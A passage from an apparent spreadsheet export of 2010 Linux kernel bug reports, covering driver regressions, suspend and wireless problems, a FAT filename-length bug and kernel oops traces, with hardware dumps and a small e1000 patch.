snd_page_alloc 5941 3 snd_wss_lib,snd_ca0106,snd_pcm, Live 0xf8135000 nvidia 7035787 24 - Live 0xf8c14000 (P) fan 2570 0 - Live 0xf811f000 snd_mpu401 3832 0 - Live 0xf810e000 snd_mpu401_uart 4919 3 snd_wavefront,snd_cs4236,snd_mpu401, Live 0xf80f9000 snd_rawmidi 15247 3 snd_wavefront,snd_ca0106,snd_mpu401_uart, Live 0xf80df000 snd_seq_device 4353 5 snd_seq_dummy,snd_seq_oss,snd_seq,snd_opl3_lib,snd_rawmidi, Live 0xf80b9000 snd 42602 21 snd_seq_oss,snd_wavefront,snd_seq,snd_cs4236,snd_wss_lib,snd_opl3_lib,snd_hwdep,snd_pcm_oss,snd_ca0106,snd_ac97_codec,snd_pcm,snd_timer,snd_mixer_oss,snd_mpu401,snd_mpu401_uart,snd_rawmidi,snd_seq_device, Live 0xf8072000 soundcore 5017 1 snd, Live 0xf8058000 ohci_hcd 19441 0 - Live 0xf8048000 analog 7843 0 - Live 0xf8021000 ppdev 4854 0 - Live 0xf8014000 nvidia_agp 4136 1 - Live 0xf848a000 i2c_nforce2 4784 0 - Live 0xf847e000 parport_pc 27863 1 - Live 0xf846b000 ns558 1967 0 - Live 0xf844a000 gameport 7165 3 analog,ns558, Live 0xf8437000 parport 25403 3 gamecon,ppdev,parport_pc, Live 0xf8420000 ehci_hcd 31918 0 - Live 0xf83d9000 shpchp 25563 0 - Live 0xf8392000 agpgart 23120 2 nvidia,nvidia_agp, Live 0xf836d000 i2c_core 15144 2 nvidia,i2c_nforce2, Live 0xf8356000 usbcore 120469 6 usbhid,pl2303,usbserial,ohci_hcd,ehci_hcd, Live 0xf8316000 sg 20760 0 - Live 0xf82dd000 thermal 9746 0 - Live 0xf82c9000 pci_hotplug 21691 1 shpchp, Live 0xf82b6000 evdev 6780 7 - Live 0xf82a3000 button 3738 0 - Live 0xf8297000 processor 25232 0 - Live 0xf8284000 forcedeth 47387 0 - Live 0xf8261000 rtc_cmos 7578 0 - Live 0xf8246000 rtc_core 11823 1 rtc_cmos, Live 0xf8237000 rtc_lib 1486 1 rtc_core, Live 0xf8229000 ext4 298675 2 - Live 0xf81ca000 mbcache 4282 1 ext4, Live 0xf8161000 jbd2 63017 1 ext4, Live 0xf8142000 crc16 1045 1 ext4, Live 0xf8122000 sr_mod 13129 0 - Live 0xf8115000 sd_mod 25507 4 - Live 0xf8100000 cdrom 31337 1 sr_mod, Live 0xf80e6000 pata_acpi 2300 0 - Live 0xf80d3000 pata_amd 7804 3 - Live 0xf80c8000 ata_generic 2175 0 - Live 0xf80bc000 libata 138839 3 pata_acpi,pata_amd,ata_generic, Live 0xf8087000 scsi_mod 79372 4 sg,sr_mod,sd_mod,libata, Live 0xf8032000 Ioports: 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-0060 : keyboard 0064-0064 : keyboard 0070-0073 : rtc0 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : 0000:00:09.0 0170-0177 : pata_amd 01f0-01f7 : 0000:00:09.0 01f0-01f7 : pata_amd 0200-0207 : ns558-pnp 0294-0297 : pnp 00:04 0295-0296 : w83627hf 0295-0296 : w83627hf 02f8-02ff : serial 0330-0331 : MPU401 UART 0376-0376 : 0000:00:09.0 0376-0376 : pata_amd 0378-037a : parport0 037b-037f : parport0 03c0-03df : vga+ 03f6-03f6 : 0000:00:09.0 03f6-03f6 : pata_amd 03f8-03ff : lirc_serial 04d0-04d1 : pnp 00:04 04e0-04e7 : pnp 00:04 0a78-0a7b : pnp 00:04 0b78-0b7b : pnp 00:04 0bbc-0bbf : pnp 00:04 0cf8-0cff : PCI conf1 0e78-0e7b : pnp 00:04 0f78-0f7b : pnp 00:04 0fbc-0fbf : pnp 00:04 4000-407f : pnp 00:00 4000-4003 : ACPI PM1a_EVT_BLK 4004-4005 : ACPI PM1a_CNT_BLK 4008-400b : ACPI PM_TMR 4020-4027 : ACPI GPE0_BLK 4080-40ff : pnp 00:00 4200-427f : pnp 00:00 4280-42ff : pnp 00:00 4400-447f : pnp 00:00 4480-44ff : pnp 00:00 44a0-44af : ACPI GPE1_BLK 5000-503f : pnp 00:01 5000-503f : nForce2_smbus 5040-507f : nForce2_smbus d000-dfff : PCI Bus 0000:01 d000-d01f : 0000:01:09.0 d000-d01f : snd_ca0106 e000-e007 : 0000:00:04.0 e000-e007 : forcedeth ec00-ec1f : 0000:00:01.1 f000-f00f : 0000:00:09.0 f000-f00f : pata_amd Iomem: 00000000-0000ffff : reserved 00010000-0009ffff : System RAM 000a0000-000bffff : Video RAM area 000c0000-000cf7ff : Video ROM 000d0000-000d17ff : Adapter ROM 000d1800-000d3fff : pnp 00:02 000f0000-000fffff : reserved 000f0000-000fffff : System ROM 00100000-3ffeffff : System RAM 01000000-012dc8fb : Kernel code 012dc8fc-0140adbf : Kernel data 01474000-0155ad83 : Kernel bss 3fff0000-3fff2fff : ACPI Non-volatile Storage 3fff3000-3fffffff : ACPI Tables d0000000-dfffffff : PCI Bus 0000:02 d0000000-dfffffff : 0000:02:00.0 e0000000-e7ffffff : 0000:00:00.0 e8000000-e9ffffff : PCI Bus 0000:02 e8000000-e8ffffff : 0000:02:00.0 e8000000-e8ffffff : nvidia e9000000-e901ffff : 0000:02:00.0 ea000000-ea0000ff : 0000:00:02.2 ea000000-ea0000ff : ehci_hcd ea001000-ea001fff : 0000:00:04.0 ea001000-ea001fff : forcedeth ea003000-ea003fff : 0000:00:02.0 ea003000-ea003fff : ohci_hcd ea004000-ea004fff : 0000:00:02.1 ea004000-ea004fff : ohci_hcd fec00000-fec00fff : reserved fec00000-fec003ff : IOAPIC 0 fee00000-fee00fff : Local APIC fee00000-fee00fff : reserved fee00000-fee00fff : pnp 00:02 ffff0000-ffffffff : reserved ffff0000-ffffffff : pnp 00:02</t>
  </si>
  <si>
    <t>the pci device is incorrectly bound with ACPI device</t>
  </si>
  <si>
    <t>2.6.28..2.6.34</t>
  </si>
  <si>
    <t>2010-07-20 09:05 UTC</t>
  </si>
  <si>
    <t>2010-09-29 03:14 UTC</t>
  </si>
  <si>
    <t>On one machine there is no ACPI device for the 0000:00:00.0 pci device. But in course of adding 0000:00:00.0 pci device, it is incorrectly bound with the ACPI device. ls -l /sys/devices/pci0000:00/0000:00:00.0/firmware_node And we will get /sys/devices/pci0000:00/0000:00:00.0/firmware_node -&gt; ../../LNXSYSTM:00/LNXSYBUS:00/PNP0A08:00/PNP0C02:02 In fact the PNP0C02:02 is not one PCI device.</t>
  </si>
  <si>
    <t>netfilter/iptables stopped logging 2.6.35-rc</t>
  </si>
  <si>
    <t>2010-07-20 12:50 UTC</t>
  </si>
  <si>
    <t>2010-08-30 20:52 UTC</t>
  </si>
  <si>
    <t>Subject : netfilter/iptables stopped logging 2.6.35-rc Submitter : auto401300@hushmail.com Date : 2010-07-17 10:20 Message-ID : 20100717072036.1BBE52804B@smtp.hushmail.com References : http://lkml.indiana.edu/hypermail/linux/kernel/1007.2/00440.html This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.35-rc5 panic at __br_deliver+0x64/0xe0 with kvm bridge networking</t>
  </si>
  <si>
    <t>2010-07-23 17:24 UTC</t>
  </si>
  <si>
    <t>2010-09-12 18:55 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35-rc5 panic at __br_deliver+0x64/0xe0 with kvm bridge networking Submitter : caiqian@redhat.com Date : 2010-07-23 3:25 Message-ID : 198123598.1050221279855515402.JavaMail.root@zmail06.collab.prod.int.phx2.redhat.com References : http://marc.info/?l=linux-kernel&amp;m=127985553916052&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>suspend2ram doesn't possible any more under X11</t>
  </si>
  <si>
    <t>v2.6.35-rc6-19-g86c65a7</t>
  </si>
  <si>
    <t>2010-07-24 10:47 UTC</t>
  </si>
  <si>
    <t>2010-07-26 18:32 UTC</t>
  </si>
  <si>
    <t>A $&gt;sync; sleep 2; sync; echo mem &gt; /sys/power/state sometimes results into a black screen and a blinking of the moon led - only power off button works in that case. The issue happens only under X11, booting the system with "init 2" (no X11, no network) works. Previous kernel 2.6.34 did not show this issue, probably the first .35-rcX too were ok. My system is a ThinkPad T400 (i915) running x11-base/xorg-server-1.7.7 and x11-drivers/xf86-video-intel-2.11.0.</t>
  </si>
  <si>
    <t>Bluetooth disabled after resume</t>
  </si>
  <si>
    <t>2010-07-25 09:33 UTC</t>
  </si>
  <si>
    <t>AttilaN</t>
  </si>
  <si>
    <t>2011-01-17 22:21 UTC</t>
  </si>
  <si>
    <t>Created attachment 27244 [details] Error message during resume If I suspend my laptop while the bluetooth mouse is connected, I get the attached error ("sysfs: cannot create duplicate filename") during resume and bluetooth is disabled. Tested on ubuntu maverick kernels (2.6.35-*) and mainline rc6, same results. It worked fine on 2.6.34 and 32. this is what I see when the mouse is not connected: ls -l /sys/class/bluetooth/ lrwxrwxrwx 1 root root 0 2010-07-25 10:31 hci0 -&gt; ../../devices/pci0000:00/0000:00:1d.3/usb5/5-2/5-2.1/5-2.1:1.0/bluetooth/hci0 after connecting: ls -l /sys/class/bluetooth/ lrwxrwxrwx 1 root root 0 2010-07-25 10:37 hci0 -&gt; ../../devices/pci0000:00/0000:00:1d.3/usb5/5-2/5-2.1/5-2.1:1.0/bluetooth/hci0 lrwxrwxrwx 1 root root 0 2010-07-25 10:39 hci0:11 -&gt; ../../devices/pci0000:00/0000:00:1d.3/usb5/5-2/5-2.1/5-2.1:1.0/bluetooth/hci0/hci0:11 On resume from standby, the hci0:11 entry is gone on 2.6.32 and 34 kernels but remains there using 2.6.35 (seems like that's causing the error?)</t>
  </si>
  <si>
    <t>unable to connect to hidden SSID AP on legal channel 13</t>
  </si>
  <si>
    <t>2.6.35-rc6</t>
  </si>
  <si>
    <t>2010-07-25 17:06 UTC</t>
  </si>
  <si>
    <t>2010-10-11 20:13 UTC</t>
  </si>
  <si>
    <t>My Intel 5300AGN hardware is unable to connect access points running on channel 12 or 13, though these channels are available according to various subsystems, and legal. In one UK-purchased AP I have control over, changing the channel to 11 allows the 5300AGN to connect, moving it back to 12 or 13 prevents connection (though it is always visible in the scan and the channel is reported correctly). It transmits the correct GB country IE also. The laptop is a Dell Studio 15 model 1557 purchased in the UK, with the iwlagn EEPROM set to a GB regdomain all as expected. Kernel is stock mainline; userspace is stock Ubuntu 10.10 pre-release, ie wireless-crda 1.12 and wireless-tools 30~pre9. Relevant dmesg output: iwlagn: Intel(R) Wireless WiFi Link AGN driver for Linux, in-tree: iwlagn: Copyright(c) 2003-2010 Intel Corporation iwlagn 0000:05:00.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 iwlagn 0000:05:00.0: setting latency timer to 64 iwlagn 0000:05:00.0: Detected Intel(R) Ultimate N WiFi Link 5300 AGN, REV=0x24 iwlagn 0000:05:00.0: Tunable channels: 13 802.11bg, 24 802.11a channels iwlagn 0000:05:00.0: irq 54 for MSI/MSI-X iwlagn 0000:05:00.0: loaded firmware version 8.24.2.12 phy0: Selected rate control algorithm 'iwl-agn-rs' cfg80211: Calling CRDA for country: GB cfg80211: Received country IE: cfg80211: Regulatory domain: GB (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp) (2402000 KHz - 2494000 KHz @ 40000 KHz), (10000 mBi, 1600 mBm) cfg80211: CRDA thinks this should applied: cfg80211: Regulatory domain: GB (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp) (2402000 KHz - 2482000 KHz @ 40000 KHz), (N/A, 2000 mBm) (5170000 KHz - 5250000 KHz @ 40000 KHz), (N/A, 2000 mBm) (5250000 KHz - 5330000 KHz @ 40000 KHz), (N/A, 2000 mBm) (5490000 KHz - 5710000 KHz @ 40000 KHz), (N/A, 2700 mBm) cfg80211: We intersect both of these and get: cfg80211: Regulatory domain: 98 (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp) (2402000 KHz - 2482000 KHz @ 40000 KHz), (N/A, 1600 mBm) cfg80211: Leaving channel 5180 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5200 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5220 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5240 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5260 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5280 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5300 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5320 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5500 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5520 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5540 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5560 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5580 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5600 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5620 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5640 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5660 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5680 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5700 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5745 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5765 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5785 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5805 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Leaving channel 5825 MHz intact on phy0 - no rule found in band on Country IE cfg80211: Current regulatory domain updated by AP to: GB (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp) (2402000 KHz - 2482000 KHz @ 40000 KHz), (N/A, 1600 mBm) $ iw reg get country 98: (2402 - 2482 @ 40), (N/A, 16) $ iw list Wiphy phy0 Band 1: Capabilities: 0x872 HT20/HT40 Static SM Power Save RX Greenfield RX HT20 SGI RX HT40 SGI No RX STBC Max AMSDU length: 3839 bytes No DSSS/CCK HT40 Maximum RX AMPDU length 65535 bytes (exponent: 0x003) Minimum RX AMPDU time spacing: 4 usec (0x05) HT TX/RX MCS rate indexes supported: 0-23, 32 Frequencies: * 2412 MHz [1] (15.0 dBm) * 2417 MHz [2] (15.0 dBm) * 2422 MHz [3] (15.0 dBm) * 2427 MHz [4] (15.0 dBm) * 2432 MHz [5] (15.0 dBm) * 2437 MHz [6] (15.0 dBm) * 2442 MHz [7] (15.0 dBm) * 2447 MHz [8] (15.0 dBm) * 2452 MHz [9] (15.0 dBm) * 2457 MHz [10] (15.0 dBm) * 2462 MHz [11] (15.0 dBm) * 2467 MHz [12] (15.0 dBm) (passive scanning, no IBSS) * 2472 MHz [13] (15.0 dBm) (passive scanning, no IBSS) Bitrates (non-HT): * 1.0 Mbps * 2.0 Mbps (short preamble supported) * 5.5 Mbps (short preamble supported) * 11.0 Mbps (short preamble supported) * 6.0 Mbps * 9.0 Mbps * 12.0 Mbps * 18.0 Mbps * 24.0 Mbps * 36.0 Mbps * 48.0 Mbps * 54.0 Mbps Band 2: Capabilities: 0x872 HT20/HT40 Static SM Power Save RX Greenfield RX HT20 SGI RX HT40 SGI No RX STBC Max AMSDU length: 3839 bytes No DSSS/CCK HT40 Maximum RX AMPDU length 65535 bytes (exponent: 0x003) Minimum RX AMPDU time spacing: 4 usec (0x05) HT TX/RX MCS rate indexes supported: 0-23, 32 Frequencies: * 5180 MHz [36] (15.0 dBm) (passive scanning, no IBSS) * 5200 MHz [40] (15.0 dBm) (passive scanning, no IBSS) * 5220 MHz [44] (15.0 dBm) (passive scanning, no IBSS) * 5240 MHz [48] (15.0 dBm) (passive scanning, no IBSS) * 5260 MHz [52] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5280 MHz [56] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5300 MHz [60] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5320 MHz [64] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5500 MHz [100] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5520 MHz [104] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5540 MHz [108] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5560 MHz [112] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5580 MHz [116] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5600 MHz [120] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5620 MHz [124] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5640 MHz [128] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5660 MHz [132] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5680 MHz [136] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5700 MHz [140] (15.0 dBm) (passive scanning, no IBSS, radar detection) * 5745 MHz [149] (15.0 dBm) (passive scanning, no IBSS) * 5765 MHz [153] (15.0 dBm) (passive scanning, no IBSS) * 5785 MHz [157] (15.0 dBm) (passive scanning, no IBSS) * 5805 MHz [161] (15.0 dBm) (passive scanning, no IBSS) * 5825 MHz [165] (15.0 dBm) (passive scanning, no IBSS) Bitrates (non-HT): * 6.0 Mbps * 9.0 Mbps * 12.0 Mbps * 18.0 Mbps * 24.0 Mbps * 36.0 Mbps * 48.0 Mbps * 54.0 Mbps max # scan SSIDs: 20 Supported interface modes: * IBSS * managed * monitor Supported commands: * new_interface * set_interface * new_key * new_beacon * new_station * new_mpath * set_mesh_params * set_bss * authenticate * associate * deauthenticate * disassociate * join_ibss * Unknown command (55) * Unknown command (57) * Unknown command (59) * set_wiphy_netns * Unknown command (65) * connect * disconnect Other wireless devices I have associate as expected with the AP on channel eg 13, however I see repeated: wpa_supplicant[1438]: Trying to associate with 00:02:cf:ea:2b:e0 (SSID='satellite' freq=2472 MHz) NetworkManager: &lt;info&gt; (wlan0): supplicant connection state: scanning -&gt; associating kernel: [29114.994159] wlan0: direct probe to 00:02:cf:ea:2b:e0 (try 1) kernel: [29115.186137] wlan0: direct probe to 00:02:cf:ea:2b:e0 (try 2) kernel: [29115.385942] wlan0: direct probe to 00:02:cf:ea:2b:e0 (try 3) kernel: [29115.588242] wlan0: direct probe to 00:02:cf:ea:2b:e0 timed out wpa_supplicant[1438]: Authentication with 00:02:cf:ea:2b:e0 timed out. What further information is useful here?</t>
  </si>
  <si>
    <t>pathconf(, _PC_NAME_MAX) returns small value for long Unicode filename on fat FS</t>
  </si>
  <si>
    <t>2.6.32-23-generic (ubuntu 10.04)</t>
  </si>
  <si>
    <t>2010-07-27 08:29 UTC</t>
  </si>
  <si>
    <t>Takumi Asaki</t>
  </si>
  <si>
    <t>2011-05-30 07:22 UTC</t>
  </si>
  <si>
    <t>pathconf(, _PC_NAME_MAX) is too small for long Unicode filename on fat. 255 as max filename size on fat is Unicode UTF-16 characters. it's not byte size. When I try to read long Unicode file using readdir() or readdir_r() they return long string than pathconf(file_on_fat_fs, _PC_NAME_MAX). And readdir_r() causes buffer overflow when users determine buffer size using pathconf()'s result. Attached program is to test it. Please change PWD to a directory on fat FS, and run it. It create long Unicode filename in PWD, and call readdir_r().</t>
  </si>
  <si>
    <t>e1000 doesn't work on machines with more than 4GB of RAM - Detected Tx Unit Hang</t>
  </si>
  <si>
    <t>2010-07-27 17:17 UTC</t>
  </si>
  <si>
    <t>2012-10-30 15:57 UTC</t>
  </si>
  <si>
    <t>Like described on this mailing list: http://www.mail-archive.com/e1000-devel@lists.sourceforge.net/msg01135.html the e1000 driver doesn't work on systems with 4 (or more) GB of RAM. The following patch fixes this Problem for me, since ~1 year, by disabling allocation of ram beyound adresses of 4GB. As this wasn't fixed already in the kernel, I'm reporting this bug, in the hope that this patch or any better code modification would fix this bug in the stable kernel. --- a/drivers/net/e1000/e1000_main.c 2010-07-26 21:39:42.448000000 +0200 +++ b/drivers/net/e1000/e1000_main.c 2010-07-26 21:41:01.268000000 +0200 @@ -826,10 +826,10 @@ if (err) return err; - if (!pci_set_dma_mask(pdev, DMA_BIT_MASK(64)) &amp;&amp; +/* if (!pci_set_dma_mask(pdev, DMA_BIT_MASK(64)) &amp;&amp; !pci_set_consistent_dma_mask(pdev, DMA_BIT_MASK(64))) { pci_using_dac = 1; - } else { + } else*/ { err = pci_set_dma_mask(pdev, DMA_BIT_MASK(32)); if (err) { err = pci_set_consistent_dma_mask(pdev, DMA_BIT_MASK(32));</t>
  </si>
  <si>
    <t>Power management does not work for ATI radeon 4870</t>
  </si>
  <si>
    <t>2010-07-27 20:28 UTC</t>
  </si>
  <si>
    <t>Jimmy Berry</t>
  </si>
  <si>
    <t>2012-05-29 09:31 UTC</t>
  </si>
  <si>
    <t>Created attachment 27277 [details] Environment information from section 7 of reporting bugs guide. I have read, been told, and confirmed with others in IRC that power management works for them so I can only assume it is a bug. Please keep in mind this is my first attempt of any kind to get involved in Linux development, albeit a very small one. Please let me know if I need to change anything in my report or if I should add any additional information. Mind my use of terminology as I am uncertain what to call things. Environment (summary): openSUSE 11.3 64 bit KDE 4.5 RC 3 Radeon HD 4870 kernel-desktop-2.6.35-rc6.14.1.x86_64 (manually installed openSUSE built package from: http://download.opensuse.org/repositories/Kernel:/HEAD/openSUSE_11.3/x86_64/) I have a radeon HD 4870 that I cannot seem to get the fan to slow down to what it should idle at. Previously, on openSUSE 11.2 I had the ATI proprietary driver installed and things were dandy. After installing 11.3 I decided to give the OSS driver a try since there was a lot of talk about how the graphics stack in 11.3 was great for ATI. Sure enough desktop effects run smoothly, very impressive, but I cannot seem to get the fan to slow down. After asking around I was pointed to http://www.h-online.com/open/features/Kernel-Log-Coming-in-2-6-35-Part-1-Graphics-1034168.html. I installed a second kernel, version kernel-desktop-2.6.35-rc6.14.1.x86_64 (suse package), and ran "echo auto &gt; /sys/class/drm/card0/device/power_profile" as root. The person I talked to said this worked great for him on his 4750, but didn't work for me on my 4870. # ls /sys/class/drm/ card0 card0-9-pin DIN-1 card0-DVI-I-1 card0-DVI-I-2 controlD64 ttm version So just for kicks I tried the others, but the only one to work was controlD64 and still nothing. The person I talked to, madigens in #suse on freenode.net, said his screen flashed when he set the power_profile and then his fan slowed, but mine did neither. I am open to suggestions, or if this is simply a bug happy to test a fix. I am a developer myself, limited C/C++ experience I deal mostly with scripting languages, but I am fairly capable when it comes to compiling and what have you so I can test out source if necessary (may required some help of course :)). Thanks in advance.</t>
  </si>
  <si>
    <t>ATH9K:Linux hangs on multi-core CPU with AR9160-based device</t>
  </si>
  <si>
    <t>2.6.32.15+drm33.5</t>
  </si>
  <si>
    <t>2010-07-28 11:15 UTC</t>
  </si>
  <si>
    <t>Mike Pithouse</t>
  </si>
  <si>
    <t>2010-08-23 14:54 UTC</t>
  </si>
  <si>
    <t>Hardware: Com Express module with 1.6GHz core 2 duo processor and 2GB RAM. Model is COM-840E-L-32 here: http://www.adlinktech.com/PD/web/PD_detail.php?cKind=&amp;pid=841&amp;seq=&amp;id=&amp;sid= Atheros AR9160 based miniPCI wi-fi module (802.11abgn). This one: http://www.aradasystems.com/product-detail/maxr-953---11a-b-g-n-%28100mw%29/ Linux: Ubuntu Server 10.04 64-bit root@ucs-cots2:~# cat /proc/version Linux version 2.6.32-23-server (buildd@yellow) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #37-Ubuntu SMP Fri Jun 11 09:11:11 UTC 2010 From the kernel map it looks like this is equivalent to 2.6.32.15+drm33.5 Problem: Linux hangs with no logs when wireless running as AP or Client with ath9k driver. I don't get the hangs if I disable multi-core processing in BIOS. Analysis: It looks like I have this bug (as mentioned in the common problems on the ath9k bugs webpage: http://wireless.kernel.org/en/users/Drivers/ath9k/bugs). "Hangs with PCI devices and SMP systems" The implemented fix is not picked up for my device (an AR9160 basic miniPCI card) as seen from the following debug output: kernel: [ 52.962332] ath9k: serialize_regmode is 0 I compiled the latest stable version of ath9k (compat-wireless-2.6.35-rc4) using compat-wireless and still got the same problem. I 'shoe-horned' the fix into the compat-wireless-2.6.32.16 driver by adding the following line to HW.C: if (ah-&gt;config.serialize_regmode == SER_REG_MODE_AUTO) { if (ah-&gt;hw_version.macVersion == AR_SREV_VERSION_5416_PCI || (AR_SREV_9280(ah) &amp;&amp; !ah-&gt;is_pciexpress)) { ah-&gt;config.serialize_regmode = SER_REG_MODE_ON; } else { ah-&gt;config.serialize_regmode = SER_REG_MODE_OFF; } } #### New line to force serialisation to ON #### ah-&gt;config.serialize_regmode = SER_REG_MODE_ON; DPRINTF(ah-&gt;ah_sc, ATH_DBG_RESET, "serialize_regmode is %d\n", ah-&gt;config.serialize_regmode); This forces serialisation on: kernel: [ 61.449975] ath9k: serialize_regmode is 1 and fixes my issue - I no longer see hangs. Is it possible to get the fix expanded to cover AR9160-based devices? Thanks.</t>
  </si>
  <si>
    <t>shifted xorg-screen with i830 integrated video</t>
  </si>
  <si>
    <t>2.6.35-rc6-git3</t>
  </si>
  <si>
    <t>2010-07-28 23:22 UTC</t>
  </si>
  <si>
    <t>2010-09-27 05:34 UTC</t>
  </si>
  <si>
    <t>I have a shifted xorg-screen, a jerking mouse and a lot of lockups with google earth on kernel 2.6.35-rc-git3. Kernel 2.6.35-rc4 (and also rc5) worked perfect!! (see my comment 7 here: https://bugzilla.kernel.org/show_bug.cgi?id=15057)</t>
  </si>
  <si>
    <t>Kernel OOPS with Radeon KMS, bisected.</t>
  </si>
  <si>
    <t>2010-08-02 13:48 UTC</t>
  </si>
  <si>
    <t>2010-08-29 22:47 UTC</t>
  </si>
  <si>
    <t>Software is Fedora 12 x86_64. The hardware is a PCI-E Radeon X1950 01:00.0 VGA compatible controller: ATI Technologies Inc R580 [Radeon X1900] 01:00.1 Display controller: ATI Technologies Inc Device 7264 On an Intel G31 based motherboard. Booting up a 2.6.35 kernel using Radeon KMS, the GPU seemingly locks up at the point gdm should kick in from plymouth. One screen remains on showing the plymouth boot screen and the other display powers off (dual 19" LCD's). The machine can still be accessed remotely. We get the following OOPS 2:38 zeus kernel: divide error: 0000 [#1] SMP Aug 2 09:52:38 zeus kernel: last sysfs file: /sys/devices/pci0000:00/0000:00:1e.0/0000:07:03.0/local_cpus Aug 2 09:52:38 zeus kernel: CPU 0 Aug 2 09:52:38 zeus kernel: Pid: 946, comm: plymouthd Not tainted 2.6.35 #45 DG33BU/ Aug 2 09:52:38 zeus kernel: RIP: 0010:[&lt;ffffffff812e2ca4&gt;] [&lt;ffffffff812e2ca4&gt;] rv515_bandwidth_avivo_update+0x450/0x5b9 Aug 2 09:52:38 zeus kernel: RSP: 0018:ffff88007a5f3ae8 EFLAGS: 00010246 Aug 2 09:52:38 zeus kernel: RAX: 0000000000000000 RBX: ffff88007ae68000 RCX: 0000000000000000 Aug 2 09:52:38 zeus kernel: RDX: 0000000000000000 RSI: ffff88007e8da000 RDI: ffff88007ae68000 Aug 2 09:52:38 zeus kernel: RBP: 0000000000000000 R08: 000000000000e808 R09: 00000000cdcdcdcd Aug 2 09:52:38 zeus kernel: R10: dead000000200200 R11: dead000000100100 R12: 0000000000000000 Aug 2 09:52:38 zeus kernel: R13: 0000000000000001 R14: ffff88007e93a000 R15: 0000000000000000 Aug 2 09:52:38 zeus kernel: FS: 00007fa3b25c3700(0000) GS:ffff880001a00000(0000) knlGS:0000000000000000 Aug 2 09:52:38 zeus kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 Aug 2 09:52:38 zeus kernel: CR2: 0000003847647488 CR3: 000000007a4cd000 CR4: 00000000000406f0 Aug 2 09:52:38 zeus kernel: DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 Aug 2 09:52:38 zeus kernel: DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Aug 2 09:52:38 zeus kernel: Process plymouthd (pid: 946, threadinfo ffff88007a5f2000, task ffff88007e875cc0) Aug 2 09:52:38 zeus kernel: Stack: Aug 2 09:52:38 zeus kernel: 0000000000000004 ffffffff812b77a2 ffff88007a5f3b28 ffff880000000000 Aug 2 09:52:38 zeus kernel: &lt;0&gt; 0000000000000000 ffff88007ae68000 0000000000000004 ffffffff812ab402 Aug 2 09:52:38 zeus kernel: &lt;0&gt; 000000000000e808 0000000000000282 ffff88007ae68000 ffffffff812e2e19 Aug 2 09:52:38 zeus kernel: Call Trace: Aug 2 09:52:38 zeus kernel: [&lt;ffffffff812b77a2&gt;] ? atom_execute_table+0x4d/0x58 Aug 2 09:52:38 zeus kernel: [&lt;ffffffff812ab402&gt;] ? radeon_atom_get_memory_clock+0x18/0x20 Aug 2 09:52:38 zeus kernel: [&lt;ffffffff812e2e19&gt;] ? rv515_bandwidth_update+0xc/0x85 Aug 2 09:52:38 zeus kernel: [&lt;ffffffff8130100f&gt;] ? radeon_pm_set_clocks+0x507/0x541 Aug 2 09:52:38 zeus kernel: [&lt;ffffffff812b77a2&gt;] ? atom_execute_table+0x4d/0x58 Aug 2 09:52:38 zeus kernel: [&lt;ffffffff8130125e&gt;] ? radeon_pm_compute_clocks+0x215/0x226 Aug 2 09:52:38 zeus kernel: [&lt;ffffffff81279eb8&gt;] ? drm_helper_disable_unused_functions+0x122/0x15b Aug 2 09:52:38 zeus kernel: [&lt;ffffffff8127abc1&gt;] ? drm_crtc_helper_set_config+0x5e2/0x77f Aug 2 09:52:38 zeus kernel: 